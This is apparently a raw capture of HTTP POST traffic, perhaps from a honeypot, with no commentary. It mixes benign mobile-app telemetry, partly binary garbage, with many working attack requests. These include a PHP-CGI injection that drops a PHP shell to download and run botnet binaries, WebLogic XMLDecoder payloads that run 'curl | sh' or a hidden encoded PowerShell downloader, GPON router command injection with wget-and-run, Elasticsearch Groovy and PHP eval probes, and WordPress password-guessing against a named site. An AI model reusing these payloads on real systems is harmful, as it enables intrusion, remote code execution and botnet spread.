xúã»∂405u22Ú…À»ı(….0sru
.M3,ïƒ	¡

POST http://behacdn.ksmobile.net/cpsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 510

˛
x`&f
ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpj_èqxsû(
n\˝L.
ˆù©>€fl.#ât˛sc|ìësä˙Ó ˛à_¿œ{ÜÎ∞Ω±zb”ˆÕËÊÇ—[•6ôÜüΩQ◊h)˘„%ÙÑ^V—_€/Ç–“÷n{[∆T1¬ì8ıõn|%s¯
É√?ê¿VTD©¶B™
ΩÅp§∂q<·‡,ËMë"∂ˇ∂”*[nXSN«¢Gbh⁄€ôÍ∫öˇœÑEX&ˇ	üI¯Ã∞x«ôw^P„@∂ƒå|Z¢ítín†-%-·ÊŸ;GrÆk Ã˛Z<|&´5û∂´X'ª∫ïÃû?Êtú§A¢ëf –◊éZpo@ΩóXÂ*6H6ˆBO˛gÄjí"¡êpH/¬ï(O&ög\»:nÌ(∑^5¨1¨+Vjß-q˜•ÎcÆéÊv…Qûî\ºÚ툮÷g®˝´PìÆæÃe(˙SJL‡LÒóπ…	Å˝ßä≥–9Z¸¢ë3~ª’X<Ôºm‚°jPnèÈÕ8\¸6gùè∆∞¶Ú·E˙´ÙV<ò®ßbjóÊ–˚VŒœ€nã]√∏»ö™˘Õl‘cÃvhÄÀò)F≥÷àùî
≈7C#‹,ïr?£^·+6:

POST /cgi-bin/php-cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (compatible; Zollard; Linux)
Content-Type: application/x-www-form-urlencoded
Content-Length: 1833
Connection: close

<?php
echo "Zollard";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
{
 $disablefunc = str_replace(" ","",$disablefunc);
 $disablefunc = explode(",",$disablefunc);
}
function myshellexec($cmd)
{
 global $disablefunc;
 $result = "";
 if (!empty($cmd))
 {
  if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
  elseif (($result = `$cmd`) !== FALSE) {}
  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
  elseif (is_resource($fp = popen($cmd,"r")))
  {
   $result = "";
   while(!feof($fp)) {$result .= fread($fp,1024);}
   pclose($fp);
  }
 }
 return $result;
}
myshellexec("rm -rf /tmp/armeabi;wget -P /tmp http://169.254.221.185:58455/armeabi;chmod +x /tmp/armeabi");
myshellexec("rm -rf /tmp/arm;wget -P /tmp http://169.254.221.185:58455/arm;chmod +x /tmp/arm");
myshellexec("rm -rf /tmp/ppc;wget -P /tmp http://169.254.221.185:58455/ppc;chmod +x /tmp/ppc");
myshellexec("rm -rf /tmp/mips;wget -P /tmp http://169.254.221.185:58455/mips;chmod +x /tmp/mips");
myshellexec("rm -rf /tmp/mipsel;wget -P /tmp http://169.254.221.185:58455/mipsel;chmod +x /tmp/mipsel");
myshellexec("rm -rf /tmp/x86;wget -P /tmp http://169.254.221.185:58455/x86;chmod +x /tmp/x86");
myshellexec("rm -rf /tmp/nodes;wget -P /tmp http://169.254.221.185:58455/nodes;chmod +x /tmp/nodes");
myshellexec("rm -rf /tmp/sig;wget -P /tmp http://169.254.221.185:58455/sig;chmod +x /tmp/sig");
myshellexec("/tmp/armeabi;/tmp/arm;/tmp/ppc;/tmp/mips;/tmp/mipsel;/tmp/x86;");
?>

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1061
Content-Type: multipart/form-data; boundary=hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

778284
--hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

b0c28feea804e51d9fb5feb92f406ec1
--hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--hog60q2xhEE464muks0KyT2q2i1eEjxmyDzM5--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST http://android.bugly.qq.com/rqd/async HTTP/1.1
wup_version: 3.0
cmd: 840
strategylastUpdateTime: 1490687517000
appVer: 18
prodId: e4696cbcd6
bundleId: com.differencetenderwhite.skirt
secureSessionId: 733247b121cb465c82e1f65970c22331_SZ
sdkVer: 2.2.2
platformId: 1
A37: HSPA
A38: HSPA
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: android.bugly.qq.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 892

&"¬D„ˇ≈Ö≤bo"◊‘x#–·‚_H¯Ó&nù≤R´⁄x:flú+îÒR(°‘´÷†ã–
“Y∆
£RÀˇÒVK#Å
~„î)1πA¿’∂…“*jV¥ı•Ë»
èmŒŒßÓnŒ-Ÿq˙:¢ÚÙ∞·∑¸∞"ç>‘mTI˝¬
Ô{Ã.:¬Âùw<V∆:≥|#‹6j8¶«§ ∫πiŒfä
tÑTfÔèÍ[qß≥‚Ó∫ëÃuÖ
[jC¡Óc¨|¿Xj˛[ıë-ìΩy¥ Ñ)ÔQ9¥Ô
Ø{º ≠DÑz>¢a«Kù)≈1#f`ì“YB¸jƒ¨2µ€
‰™ÍóÁ¡h£3BöO—Lô6⁄øa6¡⁄QÅç£f'`Â=”¥¯DÓ‰CµõUÔ…oT˝E¢V®3ô!a∆"L∞5<ÓR∆˝¬p£<ꈃÔRmÄëó•Œôue˘£NÚfi£9‹Ï»›ûÓø⁄≥t≤Ä—å˙Òv§—Eb»A«ä∞ëc^´-ȃ&™«≤!å√œXtÅ’ÈÅ.U¿^càíéÜm.'tû/Q‹Ò6i\ƒƒV∑∑fMŒô˙C8I√∂(˛‚™|&ò–Íë≥é1ñé%‹Ì>˛íœ’µ––ß3¨)€Ò-CE0˙Œ¯Öí2ıñ˚z–ÏrS;l„üƒœ≈x<5\@ZJ·oA.m±0cæ2h¨˜âèkgu#¯øGÂth®48b_Àö≈5.Ÿöò{Ì)fl
2ßç»Ñ”ÒÉÜ™ÃúÌ4GÚœ‡`î›%5?›6ÈZ˛b„p/¯ÌÓ˛W∞Uã,Œû†⁄«˛ÿçJ∆˙wöu÷û°
Ü?˜RE·YµÖ
)nÖÏtä˜˝•cÅîo|{`&¨XΩôU|flÄÇCñ9^û	Ì„ôŒV]Àfi|"у”8∑…ÆáÆP⁄Í$≤k ¡Ÿ‹êC_C∂õŒ¿Sö]lyrfr—¿M3,Ã<reÇÔ√œ˘nJ´≈|⁄w<º@UÅıÌkk#wLFz@ßò/‡ñ±05õ`˛¡u°˜“Œwÿ<Ͷ†µªꮈiÄ:TπD’ˇÂ/˚ûïr–Å<flñk©»W™7â$(_›√pÈ

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∏ÏÕËÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache

QaJXxYnIYoyivQuCKoViQtgc8oNURNYyCvITk+KGXb8AelCvjSVSyTy0Z0L8zGkDg7G7qHQQNMDAO8PKe0FRBT7YGiZhIl7JWvgmZcufJKVqs923KijyWAov7xn1jAvoEiprQKLcyaoK393Sp/ZVcjoOvX2T7horG1NQSnYz9KAUVp5KiLPkNNkNUSNjOcYJNcb5/oQgrOqlY+VMBOBZwdEyc3sPuMcdftQjhFiCxiHLVsmXfSIAGLvoHiv8QviXhqAWQVGcHUknA9blM/zFpGhWGt6niaCHgvxtjyLo+D0TRH6tN1vOGoAOXOYAKkrLqZs38KpwrgVwoTp6gCPVXtNc9aqulgjk4zZJpnvDtHMnkhihVOc=

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
t(ÛÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îgFY›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache

log=admin&pwd=aaaa

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 25
Cache-Control: no-cache

log=admin&pwd=p@ssword123

POST /xw.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

h=die((string)(111111111*9));

POST /app_logs HTTP/1.1
X-Umeng-UTC: 1477852328450
X-Umeng-Sdk: Android/5.6.7 musical.ly%2F4.15.0+GT-N8013%2F6.0.1+4C6E14E635355D555E3144A6F51E9977
Msg-Type: envelope
Transfer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; GT-N8013 Build/MOB30J)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip

2b7
1.05559e28267e58eb4c1000012@0bd721cc9915afb03a64492d28c9a3c9776fcc89accc9ba93de81fa97e5f0b58ñ‹fiÄ∞·xúïíΩkAáá3wâá`Dv…!WX¨≈≠Û˝’ù!ƒhPØdvg6.ÓfiÜ[r´`´b'àç¯ó‰Ô∞	÷ˆÇ{Ò-r®3’¿˚ŒÔyfi^fÙ ‰úkO“sÂñb‘L`á≈ò≈(8z˜È≈E”™åü?…ã‹Vvw7.˜Í<µE±ÿʱà%ÏnV’N·∑ªœ
ºÅµa‘a6î!ÎF13Üj3‰Ülæn1,Ã-l»∞aπ$ê!ÿ§»0i®2V¿´9Ô±ÂDx§¨„ôñíf9≈iÍœhâV6Ó*Ñ)\fiflö ˛ˆ§J}]Wì˛ƒO˚®Meq.«nRÂ∂Eåb‹>\/µRóÓ){÷XÆmYÔçw¬√£◊flfièNfl∞≥uÔ&E∑·iËÁaÀèakÙ@Å®;ó7vñ@/¸~pı«‹YkøZ ]f·5D¥L1&É‘±l¿í4h$È@iÈ2≠qBΩ?øôµ-–©˝$∑\e…L£D¢D%s·€óÛívÓJ«ˇ¶+¸xRÆ¥ÈÚ¬/'ô]˚Kœ„∆–™uLpü1ΔîËflˇ\yÁt—"∫f?é·¢ÉèËhQ4Ä«&£ˇ1	‡lÍh·‘Äü´›‚t@000021cc9915afb03a64492d28c9a3c9776fcc89accc9ba93de81fa97e5f0000 f8bded51422f4e7c6a822334c318cacc
0



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 34
Cache-Control: no-cache

log=jamesatchue&pwd=jamesatchue555

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1019
Content-Type: multipart/form-data; boundary=MKj-322w7goRJ4SbOwqHcGaEPDVIJX
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--MKj-322w7goRJ4SbOwqHcGaEPDVIJX
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--MKj-322w7goRJ4SbOwqHcGaEPDVIJX
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

603613
--MKj-322w7goRJ4SbOwqHcGaEPDVIJX
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

dcd5c8a90ffd35732301eb864fbe8f8d
--MKj-322w7goRJ4SbOwqHcGaEPDVIJX
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--MKj-322w7goRJ4SbOwqHcGaEPDVIJX
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--MKj-322w7goRJ4SbOwqHcGaEPDVIJX--


POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://check.proxyradar.com/azenv.php?auth=152389807181&a=PSCMN&i=1082781672&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://batsavcdn.ksmobile.net/bsi HTTP/1.1
Connection: close
User-Agent: CMTalkerSDK.0.0.1
Content-Type: multipart/form-data; boundary=3i2ndDfv2rTHiSisAbouNdArYfORhtTPEefj3q2f
Accept-Language: in_ID
Host: batsavcdn.ksmobile.net
Accept-Encoding: gzip
Transfer-Encoding: chunked

3f9
B^l¬
w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\_RT>WVW_f|CB+
M?(\A1TLMZ(jOZS[ge
ArW_TJdzDYS^ay
dRVYT+WVAX4|Tc
UN?M]^5,L6UYRh,D]ZH{kXjP^PJ;)AW3,Kf
TjyD^5{5DM'WVZFu?
hQYRImxYNus
Q?IH/'M2'L[>CDBC
rDTRRn|#\_PMoqG]VZchQZY@qjNYHn}JTi@Q\Okq[bxfB\TA9{G_V^ue
BrDTh+@
Ze*IiGQVUh,MTR\g,W3RLT&jNY[be
DrW]PAo|F@A9k3K@5'B5 DW~G
)f8 L=ECT=WVR^oprWDTPIhzL^R_g}fRYU@edWAPuxQaS]TId.GYY1(Pa@VPN?z	[Sdk \LTNhyA\UYnyiVWXjzL\5q6E_[Cq3WAPf|&\[PHmyM]TFu9Fj
V:'y(FV"K
O0jYNHm{iQ[ST;WVR[b{aVZWHkpAZZ]ae
QrDWU;q[Q`SgA[PMh~
Q_n-cRLMZ-jONYg~I
6XnpE	
1x5
X@m*ZA{2
]rW_MZ+jOXRYn{hJLrWy.G]7H@9:D69XA~T
ZqjNY[cx|L[Il}GUQ[by`^ZVLepYNHmk2B_
VJ9CU]2(ePJhq_QYb}
rTDTCMi.D[2-JQ1B\A?}]Sb*hGQ]YZ dNHmx&\_QJdpE_[Fu9Fj
V:'y(FV"K
O0;W@AuseQXMZ.jO]R_epeRXQNe|BTSR{kKj_Zd,B^]apI5ES_TMk
349
.^VS3z
eDBCrW
T6z
bSTh~C
Zc*I
fZVLoxLNF,kGjJLZg}E]QXe{rTL[Z>'B4,J]?OH
<jYNHmz`RBCrD]VXn{`P^W@iAT[Fu*
rQ\P9{CYZ6|N
i@Mk)@
Zfz1JLZgj	[Z6,K4F_Sh{UYnpLP`GP^SIeyWOu&
bDCBlp@XOH''
rG	O?%W@AuscJLZgyDYQSexdVXYLj|MTOH4k3Q]@<}\Q[6|JV3^RN8-F\V^f-LWrDCBzMZT^1(M5@_VU@>yCY[^`PiWXP8j@H8k|L[JmyC\U[ayrTL[Z>'B" S>E
>;W@AusrWDTPIhzL^R_g}fRYUJidWAPuzaRWWInx@[5,NVbNl{ZQ_4k \LTL9*M^ZgpdGNd.B

Sd|T1^
Cq3WAPfy&\]MZ-&WVA	8$@1I
+f8%IU%E
ZqjNY[ep
|L[Il}GUQ[by`^ZVLepYNHmkIiU>.D	P	e+KS4QXX?L
R_b
rTDTCKk|ES_o}c@TWU@<xF	\1qK4^VZ dNHmq&\_Q@myC[SFu9Fj
V>$

6:\W"

/!
AFu<
cVVXJkdWAPfxiW[QLkxCTW]cqrGDTChyC]
_e{TfGK;.TP]nyM3T[SZqjNYHgzN
d\n,	_gpJ2AU^QAl+TSZu4uO
0



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
«™›^Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
«™›^Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
pÈ!3Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
